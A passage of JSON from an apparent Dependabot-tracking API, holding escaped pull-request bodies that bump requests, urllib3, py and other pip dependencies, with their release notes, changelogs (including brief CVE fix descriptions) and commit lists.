changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e2.32.4 (2025-06-10)\u003c/h2\u003e\n\u003cp\u003e\u003cstrong\u003eSecurity\u003c/strong\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eCVE-2024-47081 Fixed an issue where a maliciously crafted URL and trusted\nenvironment will retrieve credentials for the wrong hostname/machine from a\nnetrc file.\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eImprovements\u003c/strong\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eNumerous documentation improvements\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eDeprecations\u003c/strong\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eAdded support for pypy 3.11 for Linux and macOS.\u003c/li\u003e\n\u003cli\u003eDropped support for pypy 3.9 following its end of support.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e2.32.3 (2024-05-29)\u003c/h2\u003e\n\u003cp\u003e\u003cstrong\u003eBugfixes\u003c/strong\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eFixed bug breaking the ability to specify custom SSLContexts in sub-classes of\nHTTPAdapter. (\u003ca href=\"https://redirect.github.com/psf/requests/issues/6716\"\u003e#6716\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eFixed issue where Requests started failing to run on Python versions compiled\nwithout the \u003ccode\u003essl\u003c/code\u003e module. (\u003ca href=\"https://redirect.github.com/psf/requests/issues/6724\"\u003e#6724\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e2.32.2 (2024-05-21)\u003c/h2\u003e\n\u003cp\u003e\u003cstrong\u003eDeprecations\u003c/strong\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003e\n\u003cp\u003eTo provide a more stable migration for custom HTTPAdapters impacted\nby the CVE changes in 2.32.0, we've renamed \u003ccode\u003e_get_connection\u003c/code\u003e to\na new public API, \u003ccode\u003eget_connection_with_tls_context\u003c/code\u003e. Existing custom\nHTTPAdapters will need to migrate their code to use this new API.\n\u003ccode\u003eget_connection\u003c/code\u003e is considered deprecated in all versions of Requests\u0026gt;=2.32.0.\u003c/p\u003e\n\u003cp\u003eA minimal (2-line) example has been provided in the linked PR to ease\nmigration, but we strongly urge users to evaluate if their custom adapter\nis subject to the same issue described in CVE-2024-35195. (\u003ca href=\"https://redirect.github.com/psf/requests/issues/6710\"\u003e#6710\u003c/a\u003e)\u003c/p\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e2.32.1 (2024-05-20)\u003c/h2\u003e\n\u003cp\u003e\u003cstrong\u003eBugfixes\u003c/strong\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eAdd missing test certs to the sdist distributed on PyPI.\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/psf/requests/commit/021dc729f0b71a3030cefdbec7fb57a0e80a6cfd\"\u003e\u003ccode\u003e021dc72\u003c/code\u003e\u003c/a\u003e Polish up release tooling for last manual release\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/psf/requests/commit/821770e822a20a21b207b3907ea83878bda1d396\"\u003e\u003ccode\u003e821770e\u003c/code\u003e\u003c/a\u003e Bump version and add release notes for v2.32.4\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/psf/requests/commit/59f8aa2adf1d3d06bcbf7ce6b13743a1639a5401\"\u003e\u003ccode\u003e59f8aa2\u003c/code\u003e\u003c/a\u003e Add netrc file search information to authentication documentation (\u003ca href=\"https://redirect.github.com/psf/requests/issues/6876\"\u003e#6876\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/psf/requests/commit/5b4b64c3467fd7a3c03f91ee641aaa348b6bed3b\"\u003e\u003ccode\u003e5b4b64c\u003c/code\u003e\u003c/a\u003e Add more tests to prevent regression of CVE 2024 47081\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/psf/requests/commit/7bc45877a86192af77645e156eb3744f95b47dae\"\u003e\u003ccode\u003e7bc4587\u003c/code\u003e\u003c/a\u003e Add new test to check netrc auth leak (\u003ca href=\"https://redirect.github.com/psf/requests/issues/6962\"\u003e#6962\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/psf/requests/commit/96ba401c1296ab1dda74a2365ef36d88f7d144ef\"\u003e\u003ccode\u003e96ba401\u003c/code\u003e\u003c/a\u003e Only use hostname to do netrc lookup instead of netloc\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/psf/requests/commit/7341690e842a23cf18ded0abd9229765fa88c4e2\"\u003e\u003ccode\u003e7341690\u003c/code\u003e\u003c/a\u003e Merge pull request \u003ca href=\"https://redirect.github.com/psf/requests/issues/6951\"\u003e#6951\u003c/a\u003e from tswast/patch-1\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/psf/requests/commit/6716d7c9f29df636643fa2489f98890216525cb0\"\u003e\u003ccode\u003e6716d7c\u003c/code\u003e\u003c/a\u003e remove links\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/psf/requests/commit/a7e1c745dc23c18e836febd672416ed0c5d8d8ae\"\u003e\u003ccode\u003ea7e1c74\u003c/code\u003e\u003c/a\u003e Update docs/conf.py\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/psf/requests/commit/c799b8167a13416833ad3b4f3298261a477e826f\"\u003e\u003ccode\u003ec799b81\u003c/code\u003e\u003c/a\u003e docs: fix dead links to kenreitz.org\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/psf/requests/compare/v2.32.0...v2.32.4\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `urllib3` from 1.26.19 to 2.5.0\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/urllib3/urllib3/releases\"\u003eurllib3's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e2.5.0\u003c/h2\u003e\n\u003ch2\u003e🚀 urllib3 is fundraising for HTTP/2 support\u003c/h2\u003e\n\u003cp\u003e\u003ca href=\"https://sethmlarson.dev/urllib3-is-fundraising-for-http2-support\"\u003eurllib3 is raising ~$40,000 USD\u003c/a\u003e to release HTTP/2 support and ensure long-term sustainable maintenance of the project after a sharp decline in financial support. If your company or organization uses Python and would benefit from HTTP/2 support in Requests, pip, cloud SDKs, and thousands of other projects \u003ca href=\"https://opencollective.com/urllib3\"\u003eplease consider contributing financially\u003c/a\u003e to ensure HTTP/2 support is developed sustainably and maintained for the long-haul.\u003c/p\u003e\n\u003cp\u003eThank you for your support.\u003c/p\u003e\n\u003ch1\u003eSecurity issues\u003c/h1\u003e\n\u003cp\u003eurllib3 2.5.0 fixes two moderate security issues:\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003ePool managers now properly control redirects when \u003ccode\u003eretries\u003c/code\u003e is passed — CVE-2025-50181 reported by \u003ca href=\"https://github.com/sandumjacob\"\u003e\u003ccode\u003e@​sandumjacob\u003c/code\u003e\u003c/a\u003e (5.3 Medium, GHSA-pq67-6m6q-mj2v)\u003c/li\u003e\n\u003cli\u003eRedirects are now controlled by urllib3 in the Node.js runtime — CVE-2025-50182 (5.3 Medium, GHSA-48p4-8xcf-vxj5)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch1\u003eFeatures\u003c/h1\u003e\n\u003cul\u003e\n\u003cli\u003eAdded support for the \u003ccode\u003ecompression.zstd\u003c/code\u003e module that is new in Python 3.14. See \u003ca href=\"https://peps.python.org/pep-0784/\"\u003ePEP 784\u003c/a\u003e for more information. (\u003ca href=\"https://redirect.github.com/urllib3/urllib3/issues/3610\"\u003e#3610\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eAdded support for version 0.5 of \u003ccode\u003ehatch-vcs\u003c/code\u003e (\u003ca href=\"https://redirect.github.com/urllib3/urllib3/issues/3612\"\u003e#3612\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch1\u003eBugfixes\u003c/h1\u003e\n\u003cul\u003e\n\u003cli\u003eRaised exception for \u003ccode\u003eHTTPResponse.shutdown\u003c/code\u003e on a connection already released to the pool. (\u003ca href=\"https://redirect.github.com/urllib3/urllib3/issues/3581\"\u003e#3581\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eFixed incorrect \u003ccode\u003eCONNECT\u003c/code\u003e statement when using an IPv6 proxy with \u003ccode\u003econnection_from_host\u003c/code\u003e. Previously would not be wrapped in \u003ccode\u003e[]\u003c/code\u003e. (\u003ca href=\"https://redirect.github.com/urllib3/urllib3/issues/3615\"\u003e#3615\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e2.4.0\u003c/h2\u003e\n\u003ch2\u003e🚀 urllib3 is fundraising for HTTP/2 support\u003c/h2\u003e\n\u003cp\u003e\u003ca href=\"https://sethmlarson.dev/urllib3-is-fundraising-for-http2-support\"\u003eurllib3 is raising ~$40,000 USD\u003c/a\u003e to release HTTP/2 support and ensure long-term sustainable maintenance of the project after a sharp decline in financial support. If your company or organization uses Python and would benefit from HTTP/2 support in Requests, pip, cloud SDKs, and thousands of other projects \u003ca href=\"https://opencollective.com/urllib3\"\u003eplease consider contributing financially\u003c/a\u003e to ensure HTTP/2 support is developed sustainably and maintained for the long-haul.\u003c/p\u003e\n\u003cp\u003eThank you for your support.\u003c/p\u003e\n\u003ch1\u003eFeatures\u003c/h1\u003e\n\u003cul\u003e\n\u003cli\u003eApplied PEP 639 by specifying the license fields in pyproject.toml. (\u003ca href=\"https://redirect.github.com/urllib3/urllib3/issues/3522\"\u003e#3522\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eUpdated exceptions to save and restore more properties during the pickle/serialization process. (\u003ca href=\"https://redirect.github.com/urllib3/urllib3/issues/3567\"\u003e#3567\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eAdded \u003ccode\u003everify_flags\u003c/code\u003e option to \u003ccode\u003ecreate_urllib3_context\u003c/code\u003e with a default of \u003ccode\u003eVERIFY_X509_PARTIAL_CHAIN\u003c/code\u003e and \u003ccode\u003eVERIFY_X509_STRICT\u003c/code\u003e for Python 3.13+. (\u003ca href=\"https://redirect.github.com/urllib3/urllib3/issues/3571\"\u003e#3571\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch1\u003eBugfixes\u003c/h1\u003e\n\u003cul\u003e\n\u003cli\u003eFixed a bug with partial reads of streaming data in Emscripten. (\u003ca href=\"https://redirect.github.com/urllib3/urllib3/issues/3555\"\u003e#3555\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch1\u003eMisc\u003c/h1\u003e\n\u003cul\u003e\n\u003cli\u003eSwitched to uv for installing development dependecies. (\u003ca href=\"https://redirect.github.com/urllib3/urllib3/issues/3550\"\u003e#3550\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eRemoved the \u003ccode\u003emultiple.intoto.jsonl\u003c/code\u003e asset from GitHub releases. Attestation of release files since v2.3.0 can be found on PyPI. (\u003ca href=\"https://redirect.github.com/urllib3/urllib3/issues/3566\"\u003e#3566\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e2.3.0\u003c/h2\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/urllib3/urllib3/blob/main/CHANGES.rst\"\u003eurllib3's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch1\u003e2.5.0 (2025-06-18)\u003c/h1\u003e\n\u003ch2\u003eFeatures\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eAdded support for the \u003ccode\u003ecompression.zstd\u003c/code\u003e module that is new in Python 3.14.\nSee \u003ccode\u003ePEP 784 \u0026lt;https://peps.python.org/pep-0784/\u0026gt;\u003c/code\u003e_ for more information. (\u003ccode\u003e[#3610](https://github.com/urllib3/urllib3/issues/3610) \u0026lt;https://github.com/urllib3/urllib3/issues/3610\u0026gt;\u003c/code\u003e__)\u003c/li\u003e\n\u003cli\u003eAdded support for version 0.5 of \u003ccode\u003ehatch-vcs\u003c/code\u003e (\u003ccode\u003e[#3612](https://github.com/urllib3/urllib3/issues/3612) \u0026lt;https://github.com/urllib3/urllib3/issues/3612\u0026gt;\u003c/code\u003e__)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eBugfixes\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eFixed a security issue where restricting the maximum number of followed\nredirects at the \u003ccode\u003eurllib3.PoolManager\u003c/code\u003e level via the \u003ccode\u003eretries\u003c/code\u003e parameter\ndid not work.\u003c/li\u003e\n\u003cli\u003eMade the Node.js runtime respect redirect parameters such as \u003ccode\u003eretries\u003c/code\u003e\nand \u003ccode\u003eredirects\u003c/code\u003e.\u003c/li\u003e\n\u003cli\u003eRaised exception for \u003ccode\u003eHTTPResponse.shutdown\u003c/code\u003e on a connection already released to the pool. (\u003ccode\u003e[#3581](https://github.com/urllib3/urllib3/issues/3581) \u0026lt;https://github.com/urllib3/urllib3/issues/3581\u0026gt;\u003c/code\u003e__)\u003c/li\u003e\n\u003cli\u003eFixed incorrect \u003ccode\u003eCONNECT\u003c/code\u003e statement when using an IPv6 proxy with \u003ccode\u003econnection_from_host\u003c/code\u003e. Previously would not be wrapped in \u003ccode\u003e[]\u003c/code\u003e. (\u003ccode\u003e[#3615](https://github.com/urllib3/urllib3/issues/3615) \u0026lt;https://github.com/urllib3/urllib3/issues/3615\u0026gt;\u003c/code\u003e__)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch1\u003e2.4.0 (2025-04-10)\u003c/h1\u003e\n\u003ch2\u003eFeatures\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eApplied PEP 639 by specifying the license fields in pyproject.toml. (\u003ccode\u003e[#3522](https://github.com/urllib3/urllib3/issues/3522) \u0026lt;https://github.com/urllib3/urllib3/issues/3522\u0026gt;\u003c/code\u003e__)\u003c/li\u003e\n\u003cli\u003eUpdated exceptions to save and restore more properties during the pickle/serialization process. (\u003ccode\u003e[#3567](https://github.com/urllib3/urllib3/issues/3567) \u0026lt;https://github.com/urllib3/urllib3/issues/3567\u0026gt;\u003c/code\u003e__)\u003c/li\u003e\n\u003cli\u003eAdded \u003ccode\u003everify_flags\u003c/code\u003e option to \u003ccode\u003ecreate_urllib3_context\u003c/code\u003e with a default of \u003ccode\u003eVERIFY_X509_PARTIAL_CHAIN\u003c/code\u003e and \u003ccode\u003eVERIFY_X509_STRICT\u003c/code\u003e for Python 3.13+. (\u003ccode\u003e[#3571](https://github.com/urllib3/urllib3/issues/3571) \u0026lt;https://github.com/urllib3/urllib3/issues/3571\u0026gt;\u003c/code\u003e__)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eBugfixes\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eFixed a bug with partial reads of streaming data in Emscripten. (\u003ccode\u003e[#3555](https://github.com/urllib3/urllib3/issues/3555) \u0026lt;https://github.com/urllib3/urllib3/issues/3555\u0026gt;\u003c/code\u003e__)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eMisc\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eSwitched to uv for installing development dependecies. (\u003ccode\u003e[#3550](https://github.com/urllib3/urllib3/issues/3550) \u0026lt;https://github.com/urllib3/urllib3/issues/3550\u0026gt;\u003c/code\u003e__)\u003c/li\u003e\n\u003cli\u003eRemoved the \u003ccode\u003emultiple.intoto.jsonl\u003c/code\u003e asset from GitHub releases. Attestation of release files since v2.3.0 can be found on PyPI. (\u003ccode\u003e[#3566](https://github.com/urllib3/urllib3/issues/3566) \u0026lt;https://github.com/urllib3/urllib3/issues/3566\u0026gt;\u003c/code\u003e__)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch1\u003e2.3.0 (2024-12-22)\u003c/h1\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/urllib3/urllib3/commit/aaab4eccc10c965897540b21e15f11859d0b62e7\"\u003e\u003ccode\u003eaaab4ec\u003c/code\u003e\u003c/a\u003e Release 2.5.0\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/urllib3/urllib3/commit/7eb4a2aafe49a279c29b6d1f0ed0f42e9736194f\"\u003e\u003ccode\u003e7eb4a2a\u003c/code\u003e\u003c/a\u003e Merge commit from fork\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/urllib3/urllib3/commit/f05b1329126d5be6de501f9d1e3e36738bc08857\"\u003e\u003ccode\u003ef05b132\u003c/code\u003e\u003c/a\u003e Merge commit from fork\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/urllib3/urllib3/commit/d03fe327a71d09728512217149f269763671f296\"\u003e\u003ccode\u003ed03fe32\u003c/code\u003e\u003c/a\u003e Fix HTTP tunneling with IPv6 in older Python versions\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/urllib3/urllib3/commit/11661e9bb4278e43d081f47a516e287a928c2206\"\u003e\u003ccode\u003e11661e9\u003c/code\u003e\u003c/a\u003e Bump github/codeql-action from 3.28.0 to 3.29.0 (\u003ca href=\"https://redirect.github.com/urllib3/urllib3/issues/3624\"\u003e#3624\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/urllib3/urllib3/commit/6a0ecc6b16fe30f721021b44a81d19615098c71e\"\u003e\u003ccode\u003e6a0ecc6\u003c/code\u003e\u003c/a\u003e Update v2 migration guide to 2.4.0 (\u003ca href=\"https://redirect.github.com/urllib3/urllib3/issues/3621\"\u003e#3621\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/urllib3/urllib3/commit/8e32e60d9024c05bc6f7adda08bdf6c539d0b0d4\"\u003e\u003ccode\u003e8e32e60\u003c/code\u003e\u003c/a\u003e Raise exception for shutdown on a connection already released to the pool (\u003ca href=\"https://redirect.github.com/urllib3/urllib3/issues/3\"\u003e#3\u003c/a\u003e...\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/urllib3/urllib3/commit/9996e0fbf90b77083ad3c73737a6c6395703faa9\"\u003e\u003ccode\u003e9996e0f\u003c/code\u003e\u003c/a\u003e Fix emscripten CI for Chrome 137+ (\u003ca href=\"https://redirect.github.com/urllib3/urllib3/issues/3599\"\u003e#3599\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/urllib3/urllib3/commit/4fd1a99a59725faf0efc946ce3b6bc9a194420af\"\u003e\u003ccode\u003e4fd1a99\u003c/code\u003e\u003c/a\u003e Bump RECENT_DATE (\u003ca href=\"https://redirect.github.com/urllib3/urllib3/issues/3617\"\u003e#3617\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/urllib3/urllib3/commit/c4b5917e911a90c8bf279448df8952a682294135\"\u003e\u003ccode\u003ec4b5917\u003c/code\u003e\u003c/a\u003e Add support for the new \u003ccode\u003ecompression.zstd\u003c/code\u003e module in Python 3.14 (\u003ca href=\"https://redirect.github.com/urllib3/urllib3/issues/3611\"\u003e#3611\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/urllib3/urllib3/compare/1.26.19...2.5.0\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\n\nDependabot will resolve any conflicts with this PR as long as you don't alter it yourself. You can also trigger a rebase manually by commenting `@dependabot rebase`.\n\n[//]: # (dependabot-automerge-start)\n[//]: # (dependabot-automerge-end)\n\n---\n\n\u003cdetails\u003e\n\u003csummary\u003eDependabot commands and options\u003c/summary\u003e\n\u003cbr /\u003e\n\nYou can trigger Dependabot actions by commenting on this PR:\n- `@dependabot rebase` will rebase this PR\n- `@dependabot recreate` will recreate this PR, overwriting any edits that have been made to it\n- `@dependabot merge` will merge this PR after your CI passes on it\n- `@dependabot squash and merge` will squash and merge this PR after your CI passes on it\n- `@dependabot cancel merge` will cancel a previously requested merge and block automerging\n- `@dependabot reopen` will reopen this PR if it is closed\n- `@dependabot close` will close this PR and stop Dependabot recreating it. You can achieve the same result by closing it manually\n- `@dependabot show \u003cdependency name\u003e ignore conditions` will show all of the ignore conditions of the specified dependency\n- `@dependabot ignore \u003cdependency name\u003e major version` will close this group update PR and stop Dependabot creating any more for the specific dependency's major version (unless you unignore this specific dependency's major version or upgrade to it yourself)\n- `@dependabot ignore \u003cdependency name\u003e minor version` will close this group update PR and stop Dependabot creating any more for the specific dependency's minor version (unless you unignore this specific dependency's minor version or upgrade to it yourself)\n- `@dependabot ignore \u003cdependency name\u003e` will close this group update PR and stop Dependabot creating any more for the specific dependency (unless you unignore this specific dependency or upgrade to it yourself)\n- `@dependabot unignore \u003cdependency name\u003e` will remove all of the ignore conditions of the specified dependency\n- `@dependabot unignore \u003cdependency name\u003e \u003cignore condition\u003e` will remove the ignore condition of the specified dependency and ignore conditions\nYou can disable automated security fix PRs for this repo from the [Security Alerts page](https://github.com/Melissa-Forbs/solana-program-library/network/alerts).\n\n\u003c/details\u003e","html_url":"https://github.com/Melissa-Forbs/solana-program-library/pull/1648","url":"https://dependabot.ecosyste.ms/api/v1/hosts/GitHub/repositories/Melissa-Forbs%2Fsolana-program-library/issues/1648","packages_url":"https://dependabot.ecosyste.ms/api/v1/issues/1648/packages"}},{"old_version":"1.4.9","new_version":"1.11.0","update_type":"minor","path":null,"pr_created_at":"2025-07-25T01:02:07.000Z","version_change":"1.4.9 → 1.11.0","issue":{"uuid":"2693553824","node_id":"PR_kwDOAmd4As6gjF6g","number":1,"state":"open","title":"Bump the pip group across 1 directory with 6 updates","user":"dependabot[bot]","labels":["dependencies","python"],"assignees":[],"locked":false,"comments_count":0,"pull_request":true,"closed_at":null,"author_association":"NONE","state_reason":null,"created_at":"2025-07-25T01:02:07.000Z","updated_at":"2025-07-25T01:02:08.000Z","time_to_close":null,"merged_at":null,"merged_by":null,"closed_by":null,"dependency_metadata":{"prefix":"Bump","group_name":"pip","update_count":6,"packages":[{"name":"py","old_version":"1.4.9","new_version":"1.11.0","repository_url":"https://github.com/pytest-dev/py"},{"name":"flask","old_version":"0.9","new_version":"2.2.5","repository_url":"https://github.com/pallets/flask"},{"name":"jinja2","old_version":"2.6","new_version":"3.1.6","repository_url":"https://github.com/pallets/jinja"},{"name":"pillow","old_version":"1.7.7","new_version":"10.3.0","repository_url":"https://github.com/python-pillow/Pillow"},{"name":"werkzeug","old_version":"0.8.3","new_version":"3.0.6","repository_url":"https://github.com/pallets/werkzeug"},{"name":"tornado","old_version":"2.3","new_version":"6.5","repository_url":"https://github.com/tornadoweb/tornado"}],"path":null,"ecosystem":"pip"},"body":"Bumps the pip group with 6 updates in the / directory:\n\n| Package | From | To |\n| --- | --- | --- |\n| [py](https://github.com/pytest-dev/py) | `1.4.9` | `1.11.0` |\n| [flask](https://github.com/pallets/flask) | `0.9` | `2.2.5` |\n| [jinja2](https://github.com/pallets/jinja) | `2.6` | `3.1.6` |\n| [pillow](https://github.com/python-pillow/Pillow) | `1.7.7` | `10.3.0` |\n| [werkzeug](https://github.com/pallets/werkzeug) | `0.8.3` | `3.0.6` |\n| [tornado](https://github.com/tornadoweb/tornado) | `2.3` | `6.5` |\n\n\nUpdates `py` from 1.4.9 to 1.11.0\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/pytest-dev/py/blob/master/CHANGELOG.rst\"\u003epy's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch1\u003e1.11.0 (2021-11-04)\u003c/h1\u003e\n\u003cul\u003e\n\u003cli\u003eSupport Python 3.11\u003c/li\u003e\n\u003cli\u003eSupport \u003ccode\u003eNO_COLOR\u003c/code\u003e environment variable\u003c/li\u003e\n\u003cli\u003eUpdate vendored apipkg: 1.5 =\u0026gt; 2.0\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch1\u003e1.10.0 (2020-12-12)\u003c/h1\u003e\n\u003cul\u003e\n\u003cli\u003eFix a regular expression DoS vulnerability in the py.path.svnwc SVN blame functionality (CVE-2020-29651)\u003c/li\u003e\n\u003cli\u003eUpdate vendored apipkg: 1.4 =\u0026gt; 1.5\u003c/li\u003e\n\u003cli\u003eUpdate vendored iniconfig: 1.0.0 =\u0026gt; 1.1.1\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch1\u003e1.9.0 (2020-06-24)\u003c/h1\u003e\n\u003cul\u003e\n\u003cli\u003e\n\u003cp\u003eAdd type annotation stubs for the following modules:\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ccode\u003epy.error\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003epy.iniconfig\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003epy.path\u003c/code\u003e (not including SVN paths)\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003epy.io\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003epy.xml\u003c/code\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003eThere are no plans to type other modules at this time.\u003c/p\u003e\n\u003cp\u003eThe type annotations are provided in external .pyi files, not inline in the\ncode, and may therefore contain small errors or omissions. If you use \u003ccode\u003epy\u003c/code\u003e\nin conjunction with a type checker, and encounter any type errors you believe\nshould be accepted, please report it in an issue.\u003c/p\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch1\u003e1.8.2 (2020-06-15)\u003c/h1\u003e\n\u003cul\u003e\n\u003cli\u003eOn Windows, \u003ccode\u003epy.path.local\u003c/code\u003es which differ only in case now have the same\nPython hash value. Previously, such paths were considered equal but had\ndifferent hashes, which is not allowed and breaks the assumptions made by\ndicts, sets and other users of hashes.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch1\u003e1.8.1 (2019-12-27)\u003c/h1\u003e\n\u003cul\u003e\n\u003cli\u003e\n\u003cp\u003eHandle \u003ccode\u003eFileNotFoundError\u003c/code\u003e when trying to import pathlib in \u003ccode\u003epath.common\u003c/code\u003e\non Python 3.4 (\u003ca href=\"https://redirect.github.com/pytest-dev/py/issues/207\"\u003e#207\u003c/a\u003e).\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003e\u003ccode\u003epy.path.local.samefile\u003c/code\u003e now works correctly in Python 3 on Windows when dealing with symlinks.\u003c/p\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch1\u003e1.8.0 (2019-02-21)\u003c/h1\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pytest-dev/py/commit/447bac514febbb5433963582103d48bb27b3db17\"\u003e\u003ccode\u003e447bac5\u003c/code\u003e\u003c/a\u003e Update CHANGELOG.rst\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pytest-dev/py/commit/6d003d9fee08542b9a5ca663568cb30c75d6c27c\"\u003e\u003ccode\u003e6d003d9\u003c/code\u003e\u003c/a\u003e Update CHANGELOG.rst\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pytest-dev/py/commit/9cf613f3c21ca31f4a1ee9a70e6bd31dc3fe42d9\"\u003e\u003ccode\u003e9cf613f\u003c/code\u003e\u003c/a\u003e Declare support for Python 3.8-3.10\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pytest-dev/py/commit/d831150a3502363c9ca7242122d8e6cbd229169e\"\u003e\u003ccode\u003ed831150\u003c/code\u003e\u003c/a\u003e Update python_requires: Python 3.4 was already dropped\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pytest-dev/py/commit/e68532e9d67b089b17f1c96a708ff5f8ccf8bc8b\"\u003e\u003ccode\u003ee68532e\u003c/code\u003e\u003c/a\u003e Update CHANGELOG for 1.11.0\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pytest-dev/py/commit/2f03e5a7fd9eb95db110cfd1bf40b987757f9d48\"\u003e\u003ccode\u003e2f03e5a\u003c/code\u003e\u003c/a\u003e Merge pull request \u003ca 